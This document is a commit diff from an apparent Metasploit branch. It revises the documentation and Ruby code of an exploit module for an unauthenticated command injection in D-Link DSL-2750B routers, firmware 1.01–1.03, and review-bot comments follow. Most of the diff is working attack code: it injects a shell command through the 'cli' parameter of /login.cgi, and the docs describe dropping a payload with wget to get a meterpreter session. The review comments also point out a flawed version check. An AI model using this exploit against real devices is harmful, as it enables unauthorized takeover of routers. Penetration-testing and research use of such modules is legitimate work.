Fixing documentation, improving exploits code

GSoC/Meterpreter_Web_Console
lucyoa 2018-05-20 12:55:46 -04:00
parent 8dd7a27f7b
commit 6ae55aadd4
No known key found for this signature in database
GPG Key ID: 4451D394D086AF54
2 changed files with 38 additions and 42 deletions


@ -1,7 +1,9 @@
## Description
This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter. This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter.
Vulnerable firmwares are 1.01 up to 1.03. Vulnerable firmwares are 1.01 up to 1.03.
## Vulnerable Application ## Verification Steps
1. Start msfconsole 1. Start msfconsole
2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth` 2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth`
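Review bot: The description sentences at the top of this hunk are carried over unchanged and still read awkwardly for a commit that fixes documentation. "exploits unauthenticated command injection vulnerability through "cli" parameter" is missing its articles, and "Vulnerable firmwares are 1.01 up to 1.03" does not say whether the bounds are inclusive. Consider "exploits an unauthenticated command injection vulnerability through the `cli` parameter" and "Firmware versions 1.01 through 1.03 are vulnerable", which matches the inclusive `>=` / `<=` range the module's `check` uses. Step 2 also has a stray space in "Do :".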
@ -11,7 +13,7 @@ Vulnerable firmwares are 1.01 up to 1.03.
6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session 6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session
## Example ## Scenarios
``` ```
msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth


@ -51,53 +51,47 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def check def check
begin res = send_request_cgi({
res = send_request_cgi({ 'method' => 'GET',
'method' => 'GET', 'uri' => '/ayefeaturesconvert.js'
'uri' => '/ayefeaturesconvert.js' })
})
unless res unless res
vprint_error('Connection failed')
return CheckCode::Unknown
end
unless res.code.to_i == 200 && res.body.include?('DSL-2750')
vprint_status('Remote host is not a DSL-2750')
return CheckCode::Safe
end
if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
version = $1
vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
if version >= "1.01" and version <= "1.03"
return Exploit::CheckCode::Appears
end
end
CheckCode::Safe
rescue ::Rex::ConnectionError
vprint_error('Connection failed') vprint_error('Connection failed')
return CheckCode::Unknown return CheckCode::Unknown
end end
unless res.code.to_i == 200 && res.body.include?('DSL-2750')
vprint_status('Remote host is not a DSL-2750')
return CheckCode::Safe
end
if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
version = $1
vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
if version >= "1.01" and version <= "1.03"
return Exploit::CheckCode::Appears
end
end
CheckCode::Safe
rescue ::Rex::ConnectionError
vprint_error('Connection failed')
return CheckCode::Unknown
end end
def execute_command(cmd, opts) def execute_command(cmd, opts)
begin payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
payload = Rex::Text.uri_encode("multilingual show';#{cmd}'") res = send_request_cgi({
res = send_request_cgi({ 'method' => 'GET',
'method' => 'GET', 'uri' => '/login.cgi',
'uri' => '/login.cgi', 'vars_get' => {
'vars_get' => { 'cli' => "#{payload}$"
'cli' => "#{payload}$" },
}, 'encode_params' => false
'encode_params' => false }, 5)
}, 5) rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
end
end end
def exploit def exploit
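Review bot: In `check`, the firmware range test `version >= "1.01" and version <= "1.03"` is kept as a lexicographic string comparison, and the capture `(\d.\d+)` leaves the dot unescaped, so it matches any character between the digits. A captured value such as "1.021" sorts between the two bounds as a string and would return `CheckCode::Appears`, which matters because operators rely on `check` to decide whether a device needs patching. Suggest escaping the dot (`(\d\.\d+)`) and using a version-aware comparison, for example `Gem::Version.new(version)` against the two bounds, and `&&` rather than `and` for consistency with the `res.code.to_i == 200 && ...` line above it. Separately, in `execute_command` the explicit `return res` is gone and the method now depends on the `res = send_request_cgi(...)` assignment being the last expression before the method-level `rescue`; that works, but since `res` is never used the assignment can be dropped, and `opts` is unused in the visible lines as well.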